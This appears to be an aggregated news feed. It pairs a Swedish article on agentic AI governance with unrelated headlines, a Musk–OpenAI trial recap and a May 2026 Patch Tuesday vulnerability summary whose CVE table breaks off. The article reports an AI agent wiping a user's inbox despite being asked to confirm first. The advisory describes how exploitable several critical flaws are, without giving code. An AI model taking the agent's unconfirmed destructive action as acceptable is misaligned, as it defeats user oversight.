Har de alla blivit integrerade och har de identiteter? Har de genomgått en ordentlig autentiseringsprocess och vem ansvarar för dem? Den delen av infrastrukturen finns inte. Verktyg börjar dock dyka upp, eller så skapar företagen egna lösningar, säger han. – Det är det som kommer att ge cio:er sinnesro. Vi ser redan offentliga exempel på enskilda anställda som använder kraftfull agentisk AI med negativa konsekvenser. Summer Yue, Metas alignment director, bestämde sig nyligen för att använda Open Claw, ett viralt agentiskt AI-verktyg med öppen källkod, för att hantera sin inkorg. Efter att det fungerat i en testinkorg satte hon in det på riktigt. ”Inget gör en så ödmjuk som att be Open Claw att bekräfta innan det agerar och sedan se den snabbt radera hela inkorgen”, skrev hon på X. ”Jag kunde inte stoppa det från min telefon. Jag var tvungen att springa till min Mac mini som om jag skulle desarmera en bomb.” Tidigare kunde en anställd ladda upp känslig information till en chattbot eller be den skriva en rapport som de sedan kopierade och klistrade in och lät som om den var deras egen. När dessa chattbotar utvecklas till fullfjädrade agentbaserade system har agenterna nu förmågan att göra allt som en användare har behörighet att göra, inklusive att få tillgång till företagssystem. För att hantera denna nya säkerhetsrisk måste företagen gå från roll- och identitetsbaserade kontroller till avsiktsbaserade, säger Rakesh Malhotra, chef för digitala och nya tekniker på EY. Det räcker inte att fråga om en agent har behörighet att komma åt ett system för att göra en ändring i en post, säger han. Företag måste kunna fråga varför du ändrar detta. Det är en stor utmaning just nu. – Observationsstacken fångar inte upp avsikten bakom varför agenten gjorde något, säger han. Och det är verkligen viktigt att förstå. Förtroende bygger på avsikt, och det finns inget sätt för något av dessa system att fånga upp avsikten. Om en mänsklig anställd försöker omstrukturera hela kodbasen skulle hen bli ombedd att ange en god anledning till detta. – Och om du omstrukturerar utan någon specifik anledning kanske du inte borde göra det, säger Malhotra. När det gäller människor finns det sätt att avgöra detta. Jag vet inte hur man gör det med agenter. Att bygga en semantisk datagrund för agentbaserad AI Achanta från Trans Union nämner upprepade gånger den semantiska grunden för företagets One Tru-plattform. En sådan förståelse av information hjälper systemen att förstå inte bara vad data är, utan också vad den betyder och hur den relaterar till annan data. Gartner säger att utveckling av ett semantiskt lager nu är ett måste för företag som implementerar AI. “Det är det enda sättet att förbättra noggrannheten, hantera kostnaderna, avsevärt minska AI-skulden, samordna system med flera agenter och stoppa kostsamma inkonsekvenser innan de sprider sig”, säger analysföretaget. Gartner förutspår att universella semantiska lager år 2030 kommer att betraktas som kritisk infrastruktur, i likhet med dataplattformar och cybersäkerhet. Och agenter behöver sammanhang för att kunna göra något meningsfullt med data, säger KPMG:s Chandrasekaran. Det är där företagets kunskap finns. – Det är företagets nya immateriella tillgång, säger han. Sammanhanget är den nya vallgraven. För John Arsneault, cio på Goulston & Storrs, är skapandet av en solid datagrund också ett sätt att undvika leverantörsberoende. – Om du köper saker och flyttar in dina data i dem för att skapa automatiserade arbetsflöden eller agentbaserade arbetsassistenter, kommer du att ha svårt att ta dig ur det, säger han. Men om du väljer en datacentrerad strategi kan du åtminstone byta från det ena till det andra om marknaden förändras. Advokatbyrån har migrerat sina klientorienterade arbetsprodukter till Net Documents, ett dokumenthanteringssystem som är specifikt inriktat på den juridiska branschen. Och resten av de data som företaget samlar in hamnar i Entegratas juridiska data lakehouse. – Vårt mål är att alla våra andra applikationer så småningom ska peka mot det datalagret, säger han. Då kommer vi att ha dessa två miljöer där all byråns data finns, vilket gör att vi kan lägga vilket AI-verktyg vi än använder ovanpå. Det kommer också att göra dataflödena enklare att hantera, tillägger han, och göra det möjligt för byrån att snabbt anpassa sig till vilken AI-teknik som än kommer härnäst. – Oavsett om det gäller generativ AI, agentisk AI eller Anthropic-teknik är det mycket svårt att hänga med med Cowork-plugin för juridik, säger han. Och det förändras var sjätte månad. Agentisk orkestrering Den sista delen av pusslet med agentisk infrastruktur, efter att säkerhetsbarriärer har satts på plats och ett användbart datalager har skapats, är orkestrering. Agentiska AI-system kräver att agenter kommunicerar med varandra och med mänskliga användare, samt interagerar med datakällor och verktyg. Det är en komplicerad utmaning, och denna teknik är fortfarande i sin linda, även om den utvecklas snabbt. MCP är ett sådant exempel och är en viktig pusselbit för att lösa orkestreringspusslet. AI-leverantörer har varit anmärkningsvärt villiga att samarbeta här. – När sociala nätverk föddes och Facebook och Twitter diskuterade ett standardprotokoll för interaktion ville ingen anamma konkurrenternas protokoll, säger Agustin Huerta, chef för digital innovation och teknik på Globant, ett företag inom digital transformation. Nu går alla via MCP och det blir mer moget som ett standardprotokoll. Men det betyder inte att agentintegrationen är löst. Enligt en Docker-undersökning bland mer än 800 it-beslutsfattare och utvecklare är den operativa komplexiteten i att orkestrera flera komponenter den största utmaningen när det gäller att bygga agenter. I synnerhet säger 37 procent av de tillfrågade att orkestreringsramverk är för bräckliga eller omogna för produktionsanvändning, och 30 procent rapporterar brister i testning och synlighet i komplexa orkestreringar. Dessutom, även om 85 procent av teamen är bekanta med MCP, säger de flesta att det finns betydande problem med säkerhet, konfiguration och hanterbarhet som hindrar driftsättning i produktion. Och det finns andra integrationsproblem som företag måste hantera. – Ett problem som ännu inte har lösts är hur man ska få en ordentlig instrumentpanel för att styra alla dessa agenter, för att veta exakt vad som händer med var och en av dem, säger Huerta. – En instrumentpanel låter dig övervaka agenter byggda med Open AI, och en är för agenter som finns på Salesforce, men ingen kan visa telemetri i en central instrumentpanel för kontroll, granskning och loggning. För företag som just har börjat implementera agenter, eller som håller sig till en enda plattform, är detta ännu inte ett problem, tillägger han, men när de utnyttjar ett större nätverk av agenter kommer de att börja uppleva utmaningarna. Globant bygger till exempel sin egen interna kontrollpanel för agentbaserad AI. Och på Brownstein Hyatt Farber Schreck, en 50 år gammal advokatbyrå med cirka 700 anställda och kunder över hela USA, finns det flera områden där AI används, bland annat ett system för att generera anbud. Normalt kan det ta flera personer flera dagar att granska en kunds förfrågan om ett förslag, gå igenom handskrivna anteckningar eller mötesprotokoll och sammanställa annat relevant material, säger Andrew Johnson, byråns it-chef. – Vi kan mata in all den informationen i en dator och extrahera nyckelkriterier för att ta fram ett högkvalitativt första utkast på några minuter, säger han. Flera agenter krävs för olika delar av processen – en för att extrahera framgångskriterier eller personalbehov, en för att leta efter tidigare fall och lärdomar, och andra för prissättning och varumärkesstandarder. – Var och en av dessa agenter är autonom och måste samordnas så att resultatet från varje agent matas in i nästa steg, säger Johnson. För det mesta innebär det ett RAG-system, eftersom de flesta av de äldre plattformar som företaget använder ännu inte har integrerat ett MCP-lager. Beroende på uppgiften kan enskilda agenter drivas av olika modeller, vilket är ytterligare ett samordningslager som måste hanteras. Sedan finns det kostnadsövervakning. Om en AI-agent eller en grupp agenter hamnar i en oändlig återkopplingsloop kan inferenskostnaderna snabbt stiga. – Vi är medvetna om problemet, även om vi ännu inte har sett det uppstå, säger Johnson. Så vi har övervakning på plats. Om vi överskrider tröskelvärdena reagerar vi på det. Oavsett strategier eller åtgärder för att hantera bakslag förändras allt som har med AI att göra snabbare än något annat företag har sett tidigare. – Jag har arbetat med teknik i 25 år och jag har aldrig sett något liknande, säger EY:s Malhotra. De snabbast växande företagen i företagshistorien har alla skapats under de senaste tre till fyra åren. Tillväxten i användningen är helt utan motstycke. Och jag pratar hela tiden med kunder som implementerar tekniker som var mycket relevanta för nio eller tio månader sedan, och alla har gått vidare.

Article URL: https://arxiv.org/abs/2605.08419 Comments URL: https://news.ycombinator.com/item?id=48117810 Points: 274 # Comments: 64

En ö i södra Argentina pekas ut som ”ground zero” för hantavirusutbrottet. Men uppgifterna avvisas av provinsens generaldirektör för epidemiologi och miljöhälsa. – Vi har aldrig tidigare registrerat fall av hantavirus, säger Juan Facundo Petrina, till BBC .

I början av 2025 stängdes fem elever av från internatskolan Lundsberg efter att ha polisanmälts av skolan för misshandel. En av dem var entreprenören Gunilla von Platens son. Händelsen ledde till att sonen började berätta om det våld och rasism han själv utsatts för under sina år på skolan. – Som mamma går man sönder inombords, säger hon i Dokument inifrån: Arvtagarna .

Chinese satellite imagery firm MizarVision, which rose to fame with its analysis of American military deployments in the US-Israel war on Iran, is treating its addition to the US sanctions list as a badge of honour in its hiring campaign. The open-source intelligence (OSINT) start-up, formally known as Meentropy Technology Hangzhou Co Ltd, specialises in analysing data from commercial satellites and has conducted several observations of US military movements in recent months. It was added to the...

From Obama’s evening chats on Yingtai island in the grounds of Zhongnanhai to Trump’s tea reception in the Forbidden City, historic settings have long formed a symbolic backdrop to key moments in US-China diplomacy. As Trump prepares for his visit to China from Wednesday to Friday – the first by an American president in almost nine years – all eyes will not only be on the summit agenda, but also on the carefully choreographed details surrounding the reception, including sites featured in the...

Communist government plans personalized ‘data-driven decision-making based on real-time information’ by 2035

No summary in RSS payload. Open original transmission for the full article.

21-årige Ali Namdar från Katrineholm är häktad i sin utevaro vid fem tingsrätter, misstänkt för att från utlandet ha styrt en rad grova våldsdåd runt om i Sverige. Enligt SVT:s källor tillhör han toppskiktet i det kriminella Foxtrotnätverket. Nu jagas han internationellt och är en av de mest prioriterade på Europols lista över efterlysta personer.

Poya Shafie, en av Rawa ”Kurdiske räven” Majids allra närmaste män, anses av polis och åklagare vara knuten till chattaliaset ”Hamado”. SVT har nu kunnat spåra ”Hamados” direkta inblandning i förberedelserna av flera mordförsök och planerade mord i Sundsvall och Stockholm under 2022 och 2023.

12-åriga Alin och hennes lillasyster ska utvisas till Syrien – efter att ha bott i Umeå i sex år. Nu har Södra Ålidhemsskolan tagit strid för att familjen ska få stanna. Med en namninsamling vill skolan stoppa Migrationsverkets beslut. – De har alltid funnits där för mig. Jag är jättetacksam för det, säger Alin Haje Mostafa.

Göteborg subventionerar kollektivtrafiken medan regionen höjer biljettpriset. Nu kräver det rödgröna styret en prisfrysning i Västra Götaland.

OpenAI CEO Sam Altman took the stand Tuesday in Elon Musk's trial against the company, testifying that Musk repeatedly sought control of OpenAI before leaving in 2018. Altman said he opposed putting AI "under the control of any one person," while Musk's lawyer used a pointed cross-examination to attack Altman's trustworthiness. An anonymous reader shares updates from the testimony via the New York Times: Before Elon Musk left OpenAI in a power struggle in 2018, he wanted to merge the nonprofit artificial intelligence lab with Tesla, his electric car company. Mr. Musk and other OpenAI co-founders met several times to discuss the merger. OpenAI's chief executive, Sam Altman, was even offered a seat on Tesla's board of directors, according to a court document. But folding OpenAI into Tesla would have eliminated the lab's nonprofit status, and that, Mr. Altman said on the witness stand on Tuesday, was something he wanted to avoid. [...] "I believed that A.I. should not be under the control of any one person," Mr. Altman said. [...] Mr. Altman testified about his feud with Mr. Musk. He said he had become worried that Mr. Musk, who provided the early investment money for OpenAI, wanted to take control of the lab. He described what he called a "particularly harrowing moment" when his OpenAI co-founders asked Mr. Musk what would happen to his control of a potential for-profit when he died. Mr. Altman said Mr. Musk had replied that the control would pass to his children. "I was not comfortable with that," Mr. Altman said. When Mr. Musk lost a power struggle for control of the lab, he left, forcing Mr. Altman to find another big financial backer in Microsoft. But Mr. Altman ran into trouble in 2023 when OpenAI's board fired him because, as several of its members have testified in the trial, it didn't trust him. Steven Molo, Mr. Musk's lead lawyer, homed in on Mr. Altman's trustworthiness during an aggressive cross-examination. "Are you completely trustworthy?" Mr. Molo asked. "I believe so," Mr. Altman answered. After questioning Mr. Altman's trustworthiness for nearly 20 minutes, Mr. Molo turned to Mr. Altman's relationship with Mr. Musk. Mr. Altman said that after he met Mr. Musk in the mid-2010s, Mr. Musk had occasionally expressed concern about the dangers of A.I. But Mr. Musk spent far more time saying he was worried that companies like Google would get ahead in A.I. development, Mr. Altman said. (Mr. Musk testified in the trial that he had wanted to create OpenAI to prevent Google from controlling the technology.) Mr. Altman, the lawyer intimated, took advantage of Mr. Musk's concerns and was never sincere about his own A.I. fears. "Are you a person who just tells people things they want to hear whether those things are true or not?" Mr. Molo asked. The lawyer also questioned whether Mr. Atman, who became a billionaire through years of tech investments, was self-dealing through OpenAI. Mr. Molo showed a list of Mr. Altman's personal investments across a number of companies that stand to benefit from their association with OpenAI. They included Helion Energy, a start-up that has deals with Microsoft and OpenAI, and Cerebras, a chip maker in business with OpenAI. Mr. Molo asked if Mr. Altman, who is on OpenAI's board as well as its chief executive, would ever fire himself. "I have no plans to do that," Mr. Altman said. OpenAI's odd journey from nonprofit lab to what it is today -- a well-funded, for-profit company that is still connected to a nonprofit called the OpenAI Foundation with an endowment that could be worth more than $130 billion -- provided grist for Mr. Molo's questions about Mr. Altman's motivations. He implied that Mr. Altman could have continued to build OpenAI as a pure nonprofit. But the only way to build such a valuable charity was to raise billions through a for-profit venture, Mr. Altman responded. Still, the giant sums being raised appeared to upset Mr. Musk. In late 2022, according to court documents, Mr. Musk sent a text to Mr. Altman complaining that Microsoft was preparing to invest $10 billion in OpenAI. "This is a bait and switch," Mr. Musk said at the time. But Mr. Altman, under questioning from his own lawyers, said: "Every step of the way, I have done my best to maximize the value of the nonprofit. I would point out that there are not a lot of historical examples of a nonprofit at this scale." Before Altman took the stand, OpenAI board chair Bret Taylor continued his testimony that began on Monday. He said Elon Musk's 2024 bid to buy the company's assets appeared to conflict with his lawsuit and was rejected because the board did not believe OpenAI's mission should be controlled by one person. "We did not feel like it was appropriate for one person to control our mission," he said. Recap: Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine) Sam Altman Had a Bad Day In Court (Day Eight) Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven) Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six) OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five) Musk Concludes Testimony At OpenAI Trial (Day Four) Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One) Read more of this story at Slashdot.

Hey guys, Left my old company 1 month ago, really nice place tbh, just decided to keep progressing in my career. Yesterday former colleague of mine, really nice dude, has reached out to me initially asking about how I was doing.. personal stuff, and then he dropped the bombshell asking me about where to find specific information for work, it was a quick back and forth sms, I provided the answer and stoops replying. However he kept sending me screenshots after screenshots about the same issue and I simply ignored them. Today he reached out again asking if we can have a quick call to discuss some networking stuff I left behind. Now, I am more than happy to provide a quick consult but I'd be charging for that. The thing is is my colleague who's reaching out, not my former employer. If that's the case, how should I handle this? How should I reply back? I like the company, they are nice dudes, and I don't wanna burn any bridges, but I also want to put a foot down and demand for time/money for my consults Mind you I don't have a 'company' under my name :( submitted by /u/Qvosniak [link] [comments]

No summary in RSS payload. Open original transmission for the full article.

Polisen följde mobilspår – tre män åtalas för inbrott Alingsås Tidning

As suits say they're burning cash on brainboxes without seeing results

Accounting firm data breach.

That pricetag is nearly seven times higher than Trump's initial estimate, found an independent budget office.

After the Louisiana Purchase from France in 1803, which almost doubled the size of the United States’ territory, US president Thomas Jefferson commissioned the legendary Lewis and Clark expedition, which surveyed new routes from the Missouri river to the Pacific coast. It also carried out work in agriculture, ethnography (with indigenous peoples) and geography. Throughout the 19th and early 20th centuries, that was the kind of science the US government was willing to pay for – practical,...

Article URL: https://www.spacex.com/updates#starship-v3 Comments URL: https://news.ycombinator.com/item?id=48116781 Points: 291 # Comments: 512

.. if “unproxyable” is a word that is ..

Beijing intensified security and prepared key venues on Tuesday as the Chinese capital awaited the arrival of US President Donald Trump and his high-stakes talks with Chinese President Xi Jinping later this week. Trump is expected to stay at the five-star Four Seasons Hotel in northeastern Beijing after arriving on Wednesday night. His delegation is expected to stay at the nearby Kempinski Hotel Beijing Yansha Centre. While neither country has officially disclosed the delegation’s lodging, rooms...

Wine's Wayland native driver has taken another step forward with now supporting the pointer warp "wp_pointer_warp_v1" protocol...

Collins shared late last year that he had been diagnosed with an aggressive form of brain cancer.

There is no governmental mechanism to pay for an AI agent that monitors a patient between visits, calls to check in, coordinates a housing referral, or makes sure someone picks up their medication. ACCESS creates that mechanism for the first time.

[AI generated] NTN Bearing Corporation of America is a US-based subsidiary of Japan's NTN Corporation, operating in the industrial manufacturing sector. The company produces and distributes precision bearings, driveshafts, and related mechanical components used in automotive, aerospace, and industrial machinery applications. Headquartered in Mount Prospect, Illinois, it serves customers across North America with engineering support and distribution services.

Microsoft is publishing 137 vulnerabilities on May 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.Windows Netlogon: critical RCEAnyone responsible for securing a domain controller should prioritize remediation of CVE-2026-41089, which is a critical stack-based buffer overflow in Windows Netlogon with a CVSS v3 base score of 9.8. Exploitation leads to execution in the context of the Netlogon service, so that’s SYSTEM privileges on the domain controller. For most pentesters, that’s the point at which the customer report more or less writes itself. No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism.Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it’s not clear how much reassurance defenders should take. Anyone who remembers the much-discussed CVE-2020-1472 (aka ZeroLogon) back in 2020 will note that CVE-2026-41089 offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards.Windows DNS Client: critical RCEAn attacker looking for a master key for Windows assets will pay attention to CVE-2026-41096, a critical RCE in the Windows DNS client implementation. A modern computer talks to DNS the way a child in the back of a car asks “are we there yet?” The variable and complex structure of DNS responses means that DNS client implementations are also complex and thus prone to flaws. Microsoft assesses exploitation as less likely, and we can hope that modern mitigations such as heap address randomization and optional-but-recommended encrypted channel DNS will make weaponization significantly more challenging by putting barriers across specific paths to exploitation. The DNS client on Windows runs as the NetworkService role, rather than SYSTEM, but a foothold is a foothold, and skilled attackers expect to chain exploits together.JIRA/Confluence Entra ID auth plugin: critical EoPIf you’re still self-hosting Atlassian JIRA or Confluence and relying on the Microsoft Entra ID authentication plugin, you’ll want to know about CVE-2026-41103. This critical elevation of privilege vulnerability allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely. Even if you can’t always find what you want on the corporate Confluence, a motivated attacker probably will. Curiously, the patch links on the advisory lead to older versions of the plugins published in 2024.Microsoft WARP teamMicrosoft’s WARP team is credited with multiple critical vulnerabilities today, after making their first appearance in MSRC advisory acknowledgements in last month’s Patch Tuesday. We can speculate that they likely know a great deal about the current state of AI-powered vulnerability research as it applies to Microsoft products.Microsoft lifecycle updateThere are no significant Microsoft product lifecycle changes this month. Microsoft .NET 9 STS (Standard Term Support, as distinct from Long Term Support) was originally scheduled to move past the end of support in May 2026, but late last year, Microsoft granted a six-month extension, so that .NET 9 STS now reaches end of support on November 10, 2026.Summary chartsSummary tablesApps vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-26129M365 Copilot Information Disclosure VulnerabilityN/ANo7.5CVE-2026-26164M365 Copilot Information Disclosure VulnerabilityExploitation Less LikelyNo7.5CVE-2026-41614M365 Copilot for Desktop Spoofing VulnerabilityExploitation Less LikelyNo6.2CVE-2026-41100Microsoft 365 Copilot for Android Spoofing VulnerabilityExploitation UnlikelyNo4.4CVE-2026-42832Microsoft Office Spoofing VulnerabilityExploitation UnlikelyNo7.7CVE-2026-41101Microsoft Word for Android Spoofing VulnerabilityExploitation UnlikelyNo7.1Azure vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-35435Azure AI Foundry Elevation of Privilege VulnerabilityExploitation More LikelyNo8.6CVE-2026-35428Azure Cloud Shell Spoofing VulnerabilityN/ANo9.6CVE-2026-32207Azure Machine Learning Notebook Spoofing Vulnerabilityn/aNo8.8CVE-2026-33109Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.9CVE-2026-33844Azure Managed Instance for Apache Cassandra Remote Code Execution VulnerabilityN/ANo9.0CVE-2026-41105Azure Monitor Action Group Notification System Elevation of Privilege VulnerabilityN/ANo8.1CVE-2026-40379Microsoft Enterprise Security Token Service (ESTS) Spoofing VulnerabilityN/ANo9.3CVE-2026-34327Microsoft Partner Center Spoofing VulnerabilityN/ANo8.2CVE-2026-40381Azure Connected Machine Agent Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-42823Azure Logic Apps Elevation of Privilege VulnerabilityExploitation Less LikelyNo9.9CVE-2026-33833Azure Machine Learning Notebook Spoofing VulnerabilityExploitation Less LikelyNo8.2CVE-2026-32204Azure Monitor Agent Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-42830Azure Monitor Agent Metrics Extension Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.5CVE-2026-33117Azure SDK for Java Security Feature Bypass VulnerabilityExploitation UnlikelyNo9.1CVE-2026-41103Microsoft SSO Plugin for Jira & Confluence Elevation of Privilege VulnerabilityExploitation More LikelyNo9.1CVE-2026-41086Windows Admin Center in Azure Portal Elevation of Privilege VulnerabilityExploitation Less LikelyNo8.8Browser vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-7898Chromium: CVE-2026-7898 Use after free in Chromotingn/aNoCVE-2026-7899Chromium: CVE-2026-7899 Out of bounds read and write in V8n/aNoCVE-2026-7900Chromium: CVE-2026-7900 Heap buffer overflow in ANGLEn/aNoCVE-2026-7901Chromium: CVE-2026-7901 Use after free in ANGLEn/aNoCVE-2026-7902Chromium: CVE-2026-7902 Out of bounds memory access in V8n/aNoCVE-2026-7903Chromium: CVE-2026-7903 Integer overflow in ANGLEn/aNoCVE-2026-7904Chromium: CVE-2026-7904 Out of bounds read in Fontsn/aNoCVE-2026-7906Chromium: CVE-2026-7906 Use after free in SVGn/aNoCVE-2026-7907Chromium: CVE-2026-7907 Use after free in DOMn/aNoCVE-2026-7908Chromium: CVE-2026-7908 Use after free in Fullscreenn/aNoCVE-2026-7909Chromium: CVE-2026-7909 Inappropriate implementation in ServiceWorkern/aNoCVE-2026-7910Chromium: CVE-2026-7910 Use after free in Viewsn/aNoCVE-2026-7911Chromium: CVE-2026-7911 Use after free in Auran/aNoCVE-2026-7914Chromium: CVE-2026-7914 Type Confusion in Accessibilityn/aNoCVE-2026-7916Chromium: CVE-2026-7916 Insufficient data validation in InterestGroupsn/aNoCVE-2026-7917Chromium: CVE-2026-7917 Use after free in Fullscreenn/aNoCVE-2026-7918Chromium: CVE-2026-7918 Use after free in GPUn/aNoCVE-2026-7919Chromium: CVE-2026-7919 Use after free in Auran/aNoCVE-2026-7920Chromium: CVE-2026-7920 Use after free in Skian/aNoCVE-2026-7921Chromium: CVE-2026-7921 Use after free in Passwordsn/aNoCVE-2026-7922Chromium: CVE-2026-7922 Use after free in ServiceWorkern/aNoCVE-2026-7923Chromium: CVE-2026-7923 Out of bounds write in Skian/aNoCVE-2026-7924Chromium: CVE-2026-7924 Uninitialized Use in Dawnn/aNoCVE-2026-7925Chromium: CVE-2026-7925 Use after free in Chromotingn/aNoCVE-2026-7926Chromium: CVE-2026-7926 Use after free in PresentationAPIn/aNoCVE-2026-7927Chromium: CVE-2026-7927 Type Confusion in Runtimen/aNoCVE-2026-7928Chromium: CVE-2026-7928 Use after free in WebRTCn/aNoCVE-2026-7929Chromium: CVE-2026-7929 Use after free in MediaRecordingn/aNoCVE-2026-7930Chromium: CVE-2026-7930 Insufficient validation of untrusted input in Cookiesn/aNoCVE-2026-7932Chromium: CVE-2026-7932 Insufficient policy enforcement in Downloadsn/aNoCVE-2026-7933Chromium: CVE-2026-7933 Out of bounds read in WebCodecsn/aNoCVE-2026-7934Chromium: CVE-2026-7934 Insufficient validation of untrusted input in Popup Blockern/aNoCVE-2026-7935Chromium: CVE-2026-7935 Inappropriate implementation in Speechn/aNoCVE-2026-7936Chromium: CVE-2026-7936 Object lifecycle issue in V8n/aNoCVE-2026-7937Chromium: CVE-2026-7937 Insufficient policy enforcement in DevToolsn/aNoCVE-2026-7938Chromium: CVE-2026-7938 Use after free in CSSn/aNoCVE-2026-7939Chromium: CVE-2026-7939 Inappropriate implementation in SanitizerAPIn/aNoCVE-2026-7940Chromium: CVE-2026-7940 Use after free in V8n/aNoCVE-2026-7942Chromium: CVE-2026-7942 Integer overflow in ANGLEn/aNoCVE-2026-7943Chromium: CVE-2026-7943 Insufficient validation of untrusted input in ANGLEn/aNoCVE-2026-7944Chromium: CVE-2026-7944 Insufficient validation of untrusted input in Persistent Cachen/aNoCVE-2026-7945Chromium: CVE-2026-7945 Insufficient validation of untrusted input in COOPn/aNoCVE-2026-7946Chromium: CVE-2026-7946 Insufficient policy enforcement in WebUIn/aNoCVE-2026-7947Chromium: CVE-2026-7947 Insufficient validation of untrusted input in Networkn/aNoCVE-2026-7948Chromium: CVE-2026-7948 Race in Chromotingn/aNoCVE-2026-7949Chromium: CVE-2026-7949 Out of bounds read in Skian/aNoCVE-2026-7950Chromium: CVE-2026-7950 Out of bounds read and write in GFXn/aNoCVE-2026-7951Chromium: CVE-2026-7951 Out of bounds write in WebRTCn/aNoCVE-2026-7952Chromium: CVE-2026-7952 Insufficient policy enforcement in Extensionsn/aNoCVE-2026-7953Chromium: CVE-2026-7953 Insufficient validation of untrusted input in Omniboxn/aNoCVE-2026-7954Chromium: CVE-2026-7954 Race in Shared Storagen/aNoCVE-2026-7955Chromium: CVE-2026-7955 Uninitialized Use in GPUn/aNoCVE-2026-7956Chromium: CVE-2026-7956 Use after free in Navigationn/aNoCVE-2026-7957Chromium: CVE-2026-7957 Out of bounds write in Median/aNoCVE-2026-7958Chromium: CVE-2026-7958 Inappropriate implementation in ServiceWorkern/aNoCVE-2026-7959Chromium: CVE-2026-7959 Inappropriate implementation in Navigationn/aNoCVE-2026-7960Chromium: CVE-2026-7960 Race in Speechn/aNoCVE-2026-7961Chromium: CVE-2026-7961 Insufficient validation of untrusted input in Permissionsn/aNoCVE-2026-7962Chromium: CVE-2026-7962 Insufficient policy enforcement in DirectSocketsn/aNoCVE-2026-7963Chromium: CVE-2026-7963 Inappropriate implementation in ServiceWorkern/aNoCVE-2026-7964Chromium: CVE-2026-7964 Insufficient validation of untrusted input in FileSystemn/aNoCVE-2026-7965Chromium: CVE-2026-7965 Insufficient validation of untrusted input in DevToolsn/aNoCVE-2026-7966Chromium: CVE-2026-7966 Insufficient validation of untrusted input in SiteIsolationn/aNoCVE-2026-7967Chromium: CVE-2026-7967 Insufficient validation of untrusted input in Navigationn/aNoCVE-2026-7968Chromium: CVE-2026-7968 Insufficient validation of untrusted input in CORSn/aNoCVE-2026-7969Chromium: CVE-2026-7969 Integer overflow in Networkn/aNoCVE-2026-7970Chromium: CVE-2026-7970 Use after free in TopChromen/aNoCVE-2026-7971Chromium: CVE-2026-7971 Inappropriate implementation in ORBn/aNoCVE-2026-7972Chromium: CVE-2026-7972 Uninitialized Use in GPUn/aNoCVE-2026-7973Chromium: CVE-2026-7973 Integer overflow in Dawnn/aNoCVE-2026-7974Chromium: CVE-2026-7974 Use after free in Blinkn/aNoCVE-2026-7975Chromium: CVE-2026-7975 Use after free in DevToolsn/aNoCVE-2026-7976Chromium: CVE-2026-7976 Use after free in Viewsn/aNoCVE-2026-7977Chromium: CVE-2026-7977 Inappropriate implementation in Canvasn/aNoCVE-2026-7978Chromium: CVE-2026-7978 Inappropriate implementation in Companionn/aNoCVE-2026-7979Chromium: CVE-2026-7979 Inappropriate implementation in Median/aNoCVE-2026-7980Chromium: CVE-2026-7980 Use after free in WebAudion/aNoCVE-2026-7981Chromium: CVE-2026-7981 Out of bounds read in Codecsn/aNoCVE-2026-7982Chromium: CVE-2026-7982 Uninitialized Use in WebCodecsn/aNoCVE-2026-7983Chromium: CVE-2026-7983 Out of bounds read in Dawnn/aNoCVE-2026-7984Chromium: CVE-2026-7984 Use after free in ReadingModen/aNoCVE-2026-7985Chromium: CVE-2026-7985 Use after free in GPUn/aNoCVE-2026-7986Chromium: CVE-2026-7986 Insufficient policy enforcement in Autofilln/aNoCVE-2026-7987Chromium: CVE-2026-7987 Use after free in WebRTCn/aNoCVE-2026-7988Chromium: CVE-2026-7988 Type Confusion in WebRTCn/aNoCVE-2026-7989Chromium: CVE-2026-7989 Insufficient data validation in DataTransfern/aNoCVE-2026-7990Chromium: CVE-2026-7990 Insufficient validation of untrusted input in Updatern/aNoCVE-2026-7991Chromium: CVE-2026-7991 Use after free in UIn/aNoCVE-2026-7992Chromium: CVE-2026-7992 Insufficient validation of untrusted input in UIn/aNoCVE-2026-7994Chromium: CVE-2026-7994 Inappropriate implementation in Chromotingn/aNoCVE-2026-7995Chromium: CVE-2026-7995 Out of bounds read in AdFiltern/aNoCVE-2026-7996Chromium: CVE-2026-7996 Insufficient validation of untrusted input in SSLn/aNoCVE-2026-7997Chromium: CVE-2026-7997 Insufficient validation of untrusted input in Updatern/aNoCVE-2026-7998Chromium: CVE-2026-7998 Insufficient validation of untrusted input in Dialogn/aNoCVE-2026-7999Chromium: CVE-2026-7999 Inappropriate implementation in V8n/aNoCVE-2026-8000Chromium: CVE-2026-8000 Insufficient validation of untrusted input in ChromeDrivern/aNoCVE-2026-8001Chromium: CVE-2026-8001 Use after free in Printingn/aNoCVE-2026-8002Chromium: CVE-2026-8002 Use after free in Audion/aNoCVE-2026-8003Chromium: CVE-2026-8003 Insufficient validation of untrusted input in TabGroupsn/aNoCVE-2026-8004Chromium: CVE-2026-8004 Insufficient policy enforcement in DevToolsn/aNoCVE-2026-8005Chromium: CVE-2026-8005 Insufficient validation of untrusted input in Castn/aNoCVE-2026-8006Chromium: CVE-2026-8006 Insufficient policy enforcement in DevToolsn/aNoCVE-2026-8007Chromium: CVE-2026-8007 Insufficient validation of untrusted input in Castn/aNoCVE-2026-8008Chromium: CVE-2026-8008 Inappropriate implementation in DevToolsn/aNoCVE-2026-8009Chromium: CVE-2026-8009 Inappropriate implementation in Castn/aNoCVE-2026-8010Chromium: CVE-2026-8010 Insufficient validation 